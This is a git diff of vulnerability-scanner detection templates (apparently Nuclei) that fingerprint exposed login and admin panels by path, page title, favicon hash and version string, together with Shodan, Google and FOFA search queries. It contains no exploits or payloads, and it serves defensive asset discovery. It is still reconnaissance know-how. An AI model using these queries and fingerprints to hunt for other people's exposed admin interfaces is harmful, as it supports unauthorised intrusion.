--- a/exposed-panels/radius-manager.yaml
+++ b/exposed-panels/radius-manager.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6790
-  tags: panel,radius
+  tags: panel,radius,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/rancher-panel.yaml b/exposed-panels/rancher-panel.yaml
index 0bef28e3a9..0f6ad6a021 100644
--- a/exposed-panels/rancher-panel.yaml
+++ b/exposed-panels/rancher-panel.yaml
@@ -2,11 +2,15 @@ id: rancher-panel
 
 info:
   name: Rancher Login Panel
-  author: princechaddha
+  author: princechaddha, idealphase
   severity: info
   description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
   reference:
     - https://github.com/rancher/rancher
+    - https://rancher.com/
+  metadata:
+    verified: true
+    shodan-query: http.title:"Loading&hellip;"
   tags: panel,rancher,kubernetes,devops,cloud,login
 
 requests:
@@ -20,7 +24,7 @@ requests:
         part: body
         words:
           - "<title>Loading&hellip;</title>"
-          - "global-admin/config/environment"
+          - "ember-basic-dropdown-wormhole"
         condition: and
 
       - type: status
diff --git a/exposed-panels/redhat/redhat-satellite-panel.yaml b/exposed-panels/redhat/redhat-satellite-panel.yaml
new file mode 100644
index 0000000000..cc29c33c5d
--- /dev/null
+++ b/exposed-panels/redhat/redhat-satellite-panel.yaml
@@ -0,0 +1,37 @@
+id: redhat-satellite-panel
+
+info:
+  name: Red Hat Satellite Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"redhat" "Satellite"
+  tags: panel,redhat,satellite
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/users/login"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "Satellite"
+          - "redhat"
+          - "LoginPage"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '&quot;version&quot;:&quot;([0-9.]+)&quot;,'
diff --git a/exposed-panels/remote-ui-login.yaml b/exposed-panels/remote-ui-login.yaml
index 1ccdcc2d7e..5b0dbd7177 100644
--- a/exposed-panels/remote-ui-login.yaml
+++ b/exposed-panels/remote-ui-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6815
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/roxy-fileman.yaml b/exposed-panels/roxy-fileman.yaml
new file mode 100644
index 0000000000..b7237aea8e
--- /dev/null
+++ b/exposed-panels/roxy-fileman.yaml
@@ -0,0 +1,34 @@
+id: roxy-fileman
+
+info:
+  name: Roxy Fileman Detect
+  author: liquidsec,DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    google-query: intitle:"Roxy file manager"
+  tags: tech,fileupload,roxy,fileman
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.html"
+      - "{{BaseURL}}/fileman/index.html"
+      - "{{BaseURL}}/fileman/php/fileslist.php"
+      - "{{BaseURL}}/fileman/asp_net/main.ashx"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Roxy file manager'
+          - '[{"p":"'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/royalevent-management-panel.yaml b/exposed-panels/royalevent-management-panel.yaml
new file mode 100644
index 0000000000..4165fbd8cf
--- /dev/null
+++ b/exposed-panels/royalevent-management-panel.yaml
@@ -0,0 +1,28 @@
+id: royalevent-management-panel
+
+info:
+  name: Royal Event Management Admin Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+  tags: royalevent,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/royal_event/"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "Royal Event Management Software"
+          - "Welcome Administrator"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/ruckus-unleashed-panel.yaml b/exposed-panels/ruckus-unleashed-panel.yaml
index 17a84e3050..97b561c4e2 100644
--- a/exposed-panels/ruckus-unleashed-panel.yaml
+++ b/exposed-panels/ruckus-unleashed-panel.yaml
@@ -9,7 +9,7 @@ info:
     - https://www.commscope.com/ruckus/
   metadata:
     shodan-query: http.title:"Unleashed Login"
-    google-dork: intitle:"Unleashed Login"
+    google-query: intitle:"Unleashed Login"
   tags: panel,ruckus
 
 requests:
diff --git a/exposed-panels/ruckus-wireless-admin-login b/exposed-panels/ruckus-wireless-admin-login
new file mode 100644
index 0000000000..f017b7705f
--- /dev/null
+++ b/exposed-panels/ruckus-wireless-admin-login
@@ -0,0 +1,25 @@
+id: ruckus-wireless-admin-login
+info:
+  name: Ruckus Wireless Admin Login Panel
+  author: pussycat0x
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"ruckus"
+  tags: panel,exposed,ruckus
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.asp'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Ruckus Wireless Admin</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/rundeck-login.yaml b/exposed-panels/rundeck-login.yaml
new file mode 100644
index 0000000000..c797ffcad6
--- /dev/null
+++ b/exposed-panels/rundeck-login.yaml
@@ -0,0 +1,29 @@
+id: rundeck-login
+
+info:
+  name: RunDeck Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Rundeck"
+  tags: panel,rundeck
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/user/login'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Rundeck - Login</title>'
+
+      - type: word
+        part: body
+        words:
+          - 'RUNDECK ENTERPRISE - Login</title>'
diff --git a/exposed-panels/rustici-content-controller.yaml b/exposed-panels/rustici-content-controller.yaml
new file mode 100644
index 0000000000..5c56e783cb
--- /dev/null
+++ b/exposed-panels/rustici-content-controller.yaml
@@ -0,0 +1,27 @@
+id: rustici-content-controller
+
+info:
+  name: Rustici Content Controller
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Rustici Content Controller"
+  tags: panel,rustici
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '<title>Rustici Content Controller</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/saferoads-vms-login.yaml b/exposed-panels/saferoads-vms-login.yaml
index ae25e07dfe..5520f4ff0c 100644
--- a/exposed-panels/saferoads-vms-login.yaml
+++ b/exposed-panels/saferoads-vms-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6941
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/sas-login-panel.yaml b/exposed-panels/sas-login-panel.yaml
new file mode 100644
index 0000000000..de72cc408f
--- /dev/null
+++ b/exposed-panels/sas-login-panel.yaml
@@ -0,0 +1,26 @@
+id: sas-login-panel
+
+info:
+  name: SAS Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:957255151
+  tags: sas,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/SASLogon/login"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "SAS&reg; Logon Manager"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/sauter-login.yaml b/exposed-panels/sauter-login.yaml
index 4cc10ea8fc..c89313500c 100644
--- a/exposed-panels/sauter-login.yaml
+++ b/exposed-panels/sauter-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6883
-  tags: panel,sauter
+  tags: panel,sauter,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/scriptcase/scriptcase-panel.yaml b/exposed-panels/scriptcase/scriptcase-panel.yaml
new file mode 100644
index 0000000000..e3fa306aa7
--- /dev/null
+++ b/exposed-panels/scriptcase/scriptcase-panel.yaml
@@ -0,0 +1,41 @@
+id: scriptcase-panel
+
+info:
+  name: ScriptCase Panel Detect
+  author: Ricardo Maia (Brainfork)
+  severity: info
+  reference:
+    - https://www.scriptcase.com.br
+    - https://www.scriptcase.net
+  metadata:
+    verified: true
+    shodan-query: title:"ScriptCase"
+  tags: panel,scriptcase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/devel/iface/"
+      - "{{BaseURL}}/scriptcase/devel/iface/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?i)(ScriptCase)'
+          - '(?i)(NetMake)'
+          - '(?i)(Login)'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 2
+        regex:
+          - '(Vers&atilde;o|Version|Versão)\b.*\s(\d.*\d)'
diff --git a/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/exposed-panels/scriptcase/scriptcase-prod-login.yaml
new file mode 100644
index 0000000000..3d813c3bda
--- /dev/null
+++ b/exposed-panels/scriptcase/scriptcase-prod-login.yaml
@@ -0,0 +1,41 @@
+id: scriptcase-prod-login
+
+info:
+  name: ScriptCase Production Environment Login
+  author: Ricardo Maia (Brainfork)
+  severity: info
+  reference:
+    - https://www.scriptcase.com.br
+    - https://www.scriptcase.net
+  metadata:
+    verified: true
+    shodan-query: title:"ScriptCase"
+  tags: panel,scriptcase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/prod/lib/php/"
+      - "{{BaseURL}}/scriptcase/prod/lib/php/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?i)(ScriptCase)'
+          - '(?i)(NetMake)'
+          - '(?i)(Login)'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 2
+        regex:
+          - '(Vers&atilde;o|Version|Versão)\b.*\s(\d.*\d)'
diff --git a/exposed-panels/seafile-panel.yaml b/exposed-panels/seafile-panel.yaml
new file mode 100644
index 0000000000..45eb7664a3
--- /dev/null
+++ b/exposed-panels/seafile-panel.yaml
@@ -0,0 +1,23 @@
+id: seafile-panel
+
+info:
+  name: Seafile Panel
+  author: TechbrunchFR
+  severity: info
+  metadata:
+    shodan-query: http.favicon.hash:1552322396
+  reference:
+    - https://www.seafile.com/en/home/
+    - https://github.com/haiwen/seafile
+  tags: sefile,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/media/favicons/favicon.png"
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code==200 && (\"1552322396\" == mmh3(base64_py(body)))"
diff --git a/exposed-panels/seats-login.yaml b/exposed-panels/seats-login.yaml
index 33bac4b9b7..59a2d82c77 100644
--- a/exposed-panels/seats-login.yaml
+++ b/exposed-panels/seats-login.yaml
@@ -4,8 +4,6 @@ info:
   name: Seats login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22
   tags: panel
 
 requests:
diff --git a/exposed-panels/secmail-detect.yaml b/exposed-panels/secmail-detect.yaml
index 85eff91832..2ef5f2eefa 100644
--- a/exposed-panels/secmail-detect.yaml
+++ b/exposed-panels/secmail-detect.yaml
@@ -4,8 +4,8 @@ info:
   name: SecMail - secure email Detect
   author: johnk3r
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=secmail
+  metadata:
+    shodan-query: secmail
   tags: secmail,panel
 
 requests:
diff --git a/exposed-panels/securepoint-utm.yaml b/exposed-panels/securepoint-utm.yaml
index de669e56e5..bca9fb0742 100644
--- a/exposed-panels/securepoint-utm.yaml
+++ b/exposed-panels/securepoint-utm.yaml
@@ -1,32 +1,32 @@
-id: securepoint-utm
+id: securepoint-utm
 
-info:
-  name: Securepoint UTM Admin Panel
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"'
-  tags: securepoint,panel
+info:
+  name: Securepoint UTM Admin Panel
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"'
+  tags: securepoint,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: regex
-        part: body
-        regex:
-          - '<title>Securepoint UTM v11 - (.*)</title>'
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - '<title>Securepoint UTM v11 - (.*)</title>'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>'
diff --git a/exposed-panels/securityspy-detect.yaml b/exposed-panels/securityspy-detect.yaml
index 554ed506da..76a69cbbc1 100644
--- a/exposed-panels/securityspy-detect.yaml
+++ b/exposed-panels/securityspy-detect.yaml
@@ -1,25 +1,25 @@
-id: securityspy-detect
+id: securityspy-detect
 
-info:
-  name: SecuritySpy Camera Detect
-  author: pussycat0x
-  severity: medium
-  metadata:
-    shodan-dork: 'title:SecuritySpy'
-  tags: unauth,iot,securityspy,panel,camera
+info:
+  name: SecuritySpy Camera Detect
+  author: pussycat0x
+  severity: medium
+  metadata:
+    shodan-dork: 'title:SecuritySpy'
+  tags: unauth,iot,securityspy,panel,camera
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>SecuritySpy</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>SecuritySpy</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/server-backup-login.yaml b/exposed-panels/server-backup-login.yaml
index 5223f65346..c5a9daa8ae 100644
--- a/exposed-panels/server-backup-login.yaml
+++ b/exposed-panels/server-backup-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6949
-  tags: paneil,idera
+  tags: paneil,idera,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/server-backup-manager-se.yaml b/exposed-panels/server-backup-manager-se.yaml
index 8a30376825..c1dcbdddb3 100644
--- a/exposed-panels/server-backup-manager-se.yaml
+++ b/exposed-panels/server-backup-manager-se.yaml
@@ -4,8 +4,8 @@ info:
   name: Server Backup Manager SE
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Server+Backup+Manager+SE%22
+  metadata:
+    shodan-query: http.title:"Server Backup Manager SE"
   tags: panel
 
 requests:
diff --git a/exposed-panels/sgp-login-panel.yaml b/exposed-panels/sgp-login-panel.yaml
index f057842fd7..5bdae33e1f 100644
--- a/exposed-panels/sgp-login-panel.yaml
+++ b/exposed-panels/sgp-login-panel.yaml
@@ -4,8 +4,8 @@ info:
   name: SGP Panel
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22SGP%22
+  metadata:
+    shodan-query: http.title:"SGP"
   tags: panel,sgp
 
 requests:
diff --git a/exposed-panels/sharecenter-login.yaml b/exposed-panels/sharecenter-login.yaml
index d17ee46826..7409be8299 100644
--- a/exposed-panels/sharecenter-login.yaml
+++ b/exposed-panels/sharecenter-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6892
-  tags: panel,login
+  tags: edb,panel,login
 
 requests:
   - method: GET
diff --git a/exposed-panels/sicom-panel.yaml b/exposed-panels/sicom-panel.yaml
new file mode 100644
index 0000000000..c9f5943613
--- /dev/null
+++ b/exposed-panels/sicom-panel.yaml
@@ -0,0 +1,29 @@
+id: sicom-mgrng-login
+
+info:
+  name: Sicom MGRNG - Administrative Login Found
+  author: sullo
+  severity: info
+  description: |
+    Sicom MGRNG administrative login page found.
+  classification:
+    cvss-score: 0.0
+    cwe-id: CWE-668
+  tags: sicom,mgrng,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/~sicom/mgrng/LoginForm.php"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<title>MGRNG Login</title>'
+
+# Enhanced by cs on 2022/07/22
diff --git a/exposed-panels/sitefinity-login.yaml b/exposed-panels/sitefinity-login.yaml
index e660eea626..3211bf7807 100644
--- a/exposed-panels/sitefinity-login.yaml
+++ b/exposed-panels/sitefinity-login.yaml
@@ -7,7 +7,7 @@ info:
   description: This template identifies the Sitefinity login page.
   reference:
     - https://www.exploit-db.com/ghdb/6722
-  tags: panel,sitefinity
+  tags: sitefinity,edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/siteomat-login.yaml b/exposed-panels/siteomat-login.yaml
index 29e261d1d9..d39849d735 100644
--- a/exposed-panels/siteomat-login.yaml
+++ b/exposed-panels/siteomat-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6624
-  tags: panel,siteomat,login
+  tags: siteomat,login,edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/slocum-login.yaml b/exposed-panels/slocum-login.yaml
index 605b421b70..118932715d 100644
--- a/exposed-panels/slocum-login.yaml
+++ b/exposed-panels/slocum-login.yaml
@@ -1,22 +1,22 @@
-id: slocum-login
+id: slocum-login
 
-info:
-  name: Slocum Fleet Mission Control Login
-  author: pussycat0x
-  severity: info
-  tags: panel,tech,slocum
+info:
+  name: Slocum Fleet Mission Control Login
+  author: pussycat0x
+  severity: info
+  tags: panel,tech,slocum
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/sfmc/login"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>Slocum Fleet Mission Control - Login</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sfmc/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Slocum Fleet Mission Control - Login</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/smartping-dashboard.yaml b/exposed-panels/smartping-dashboard.yaml
new file mode 100644
index 0000000000..7d0be8873a
--- /dev/null
+++ b/exposed-panels/smartping-dashboard.yaml
@@ -0,0 +1,27 @@
+id: smartping-dashboard
+
+info:
+  name: Unauth SmartPing Dashboard
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: title:"SmartPing Dashboard"
+  tags: panel,misconfig,unauth,smartping
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config.html"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - 'SmartPing Dashboard'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/solarview-compact-panel.yaml b/exposed-panels/solarview-compact-panel.yaml
new file mode 100644
index 0000000000..800287fdd9
--- /dev/null
+++ b/exposed-panels/solarview-compact-panel.yaml
@@ -0,0 +1,27 @@
+id: solarview-compact-panel
+
+info:
+  name: SolarView Compact Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"SolarView Compact"
+  tags: panel,solarview,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Solar_Menu.php"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "SolarViewCompact"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/sonicwall-analyzer-login.yaml b/exposed-panels/sonicwall-analyzer-login.yaml
new file mode 100644
index 0000000000..06e082922a
--- /dev/null
+++ b/exposed-panels/sonicwall-analyzer-login.yaml
@@ -0,0 +1,26 @@
+id: sonicwall-analyzer-login
+
+info:
+  name: SonicWall Analyzer Login
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: title:"SonicWall Analyzer Login"
+  tags: panel,sonicwall
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/sgms/auth'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'SonicWall Analyzer Login'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml
index b80ae3babc..127ddc05af 100644
--- a/exposed-panels/sphider-login.yaml
+++ b/exposed-panels/sphider-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6641
-  tags: panel
+  tags: edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/splunk-login.yaml b/exposed-panels/splunk-login.yaml
index e955e90a13..ccfbcaee47 100644
--- a/exposed-panels/splunk-login.yaml
+++ b/exposed-panels/splunk-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Splunk SOAR
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Splunk+SOAR%22
+  metadata:
+    shodan-query: http.title:"Splunk SOAR"
   tags: panel,splunk
 
 requests:
diff --git a/exposed-panels/squirrelmail-login.yaml b/exposed-panels/squirrelmail-login.yaml
index 9efb883bed..0433cd0a09 100644
--- a/exposed-panels/squirrelmail-login.yaml
+++ b/exposed-panels/squirrelmail-login.yaml
@@ -2,25 +2,32 @@ id: squirrelmail-login
 
 info:
   name: SquirrelMail - Login
-  author: dhiyaneshDk
+  author: dhiyaneshDk,ritikchaddha
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7407
   metadata:
-    shodan-query: http.title:"SquirrelMail - Login"
-  tags: panel,squirrelmail
+    shodan-query: title:"SquirrelMail"
+  tags: squirrelmail,edb,panel
 
 requests:
   - method: GET
     path:
+      - "{{BaseURL}}"
       - "{{BaseURL}}/src/login.php"
+      - "{{BaseURL}}/webmail/src/login.php"
+      - "{{BaseURL}}/squirrelmail/src/login.php"
 
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
+
       - type: word
         part: body
         words:
-          - "<title>SquirrelMail - Login</title>"
+          - "SquirrelMail"
 
       - type: status
         status:
diff --git a/exposed-panels/sqwebmail-login-panel.yaml b/exposed-panels/sqwebmail-login-panel.yaml
new file mode 100644
index 0000000000..b09740a059
--- /dev/null
+++ b/exposed-panels/sqwebmail-login-panel.yaml
@@ -0,0 +1,26 @@
+id: sqwebmail-login-panel
+
+info:
+  name: SqWebMail Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"SqWebMail"
+  tags: webmail,sqwebmail,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/sqwebmail"
+      - "{{BaseURL}}/cgi-bin/webmail"
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "SqWebMail - Copyright"
diff --git a/exposed-panels/star-network-utility.yaml b/exposed-panels/star-network-utility.yaml
new file mode 100644
index 0000000000..71ea1c26f7
--- /dev/null
+++ b/exposed-panels/star-network-utility.yaml
@@ -0,0 +1,27 @@
+id: star-network-utility
+
+info:
+  name: Star Network Utility Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Network Utility"
+  tags: panel,network,utility
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Star Micronics'
+          - 'Network Utility'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml
index 8e61dffbef..c76645fdf8 100644
--- a/exposed-panels/sugarcrm-panel.yaml
+++ b/exposed-panels/sugarcrm-panel.yaml
@@ -4,8 +4,8 @@ info:
   name: Detect SugarCRM Panel
   author: johnk3r
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=sugarcrm
+  metadata:
+    shodan-query: http.title:sugarcrm
   tags: sugarcrm,panel
 
 requests:
diff --git a/exposed-panels/supermicro-bmc-panel.yaml b/exposed-panels/supermicro-bmc-panel.yaml
index 5717f7ca44..ab3b6ff63c 100644
--- a/exposed-panels/supermicro-bmc-panel.yaml
+++ b/exposed-panels/supermicro-bmc-panel.yaml
@@ -11,7 +11,7 @@ info:
     - https://www.supermicro.com/white_paper/IPMI_white_paper.pdf
   metadata:
     shodan-query: http.title:"Supermicro BMC Login"
-    google-dork: intitle:"Supermicro BMC Login"
+    google-query: intitle:"Supermicro BMC Login"
   tags: panel,supermicro,bmc
 
 requests:
diff --git a/exposed-panels/symantec/symantec-dlp-login.yaml b/exposed-panels/symantec/symantec-dlp-login.yaml
index 41dd2dde5d..fb6401856c 100644
--- a/exposed-panels/symantec/symantec-dlp-login.yaml
+++ b/exposed-panels/symantec/symantec-dlp-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Symantec Data Loss Prevention
   author: princechaddha
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22
+  metadata:
+    shodan-query: http.title:"Symantec Data Loss Prevention"
   tags: symantec,panel,login
 
 requests:
diff --git a/exposed-panels/symantec/symantec-epm-login.yaml b/exposed-panels/symantec/symantec-epm-login.yaml
index 38785e33a3..3e00e71fce 100644
--- a/exposed-panels/symantec/symantec-epm-login.yaml
+++ b/exposed-panels/symantec/symantec-epm-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Symantec Endpoint Protection Manager
   author: princechaddha
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22
+  metadata:
+    shodan-query: http.title:"Symantec Endpoint Protection Manager"
   tags: symantec,panel,login
 
 requests:
diff --git a/exposed-panels/symantec/symantec-ewep-login.yaml b/exposed-panels/symantec/symantec-ewep-login.yaml
index ba70fd514b..4f3d3acf8b 100644
--- a/exposed-panels/symantec/symantec-ewep-login.yaml
+++ b/exposed-panels/symantec/symantec-ewep-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Symantec Encryption Web Email Protection
   author: johnk3r
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22
+  metadata:
+    shodan-query: http.title:"Symantec Encryption Server"
   tags: panel,symantec,login
 
 requests:
diff --git a/exposed-panels/symantec/symantec-pgp-global-directory.yaml b/exposed-panels/symantec/symantec-pgp-global-directory.yaml
index fdacd24794..77579a9fc9 100644
--- a/exposed-panels/symantec/symantec-pgp-global-directory.yaml
+++ b/exposed-panels/symantec/symantec-pgp-global-directory.yaml
@@ -4,8 +4,8 @@ info:
   name: Symantec PGP Global Directory
   author: princechaddha
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22
+  metadata:
+    shodan-query: http.title:"PGP Global Directory"
   tags: symantec,panel
 
 requests:
diff --git a/exposed-panels/syncthru-web-service.yaml b/exposed-panels/syncthru-web-service.yaml
new file mode 100644
index 0000000000..80eaca4363
--- /dev/null
+++ b/exposed-panels/syncthru-web-service.yaml
@@ -0,0 +1,32 @@
+id: syncthru-web-service
+
+info:
+  name: SyncThru Web Service
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.exploit-db.com/ghdb/7843
+  metadata:
+    verified: true
+    shodan-query: title:"SyncThru Web Service"
+  tags: edb,panel,syncthru,printer
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sws/index.sws"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>SyncThru Web Service</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/synopsys-coverity-panel.yaml b/exposed-panels/synopsys-coverity-panel.yaml
new file mode 100644
index 0000000000..efca4fdc93
--- /dev/null
+++ b/exposed-panels/synopsys-coverity-panel.yaml
@@ -0,0 +1,32 @@
+id: synopsys-coverity-panel
+
+info:
+  name: Synopsys Coverity Panel
+  author: idealphase
+  severity: info
+  description: |
+    Coverity® is a fast, accurate, and highly scalable static analysis (SAST) solution that helps development and security teams address security and quality defects early in the software development life cycle (SDLC), track and manage risks across the application portfolio, and ensure compliance with security and coding standards.
+  reference:
+    - https://www.synopsys.com/software-integrity/security-testing/static-analysis-sast.html
+  metadata:
+    verified: true
+    shodan-query: http.title:"Coverity"
+  tags: panel,coverity,synopsys
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 1
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Coverity&reg; :: Sign in</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/tableau-panel.yaml b/exposed-panels/tableau-panel.yaml
index 148f3d6b3e..ad72efdc51 100644
--- a/exposed-panels/tableau-panel.yaml
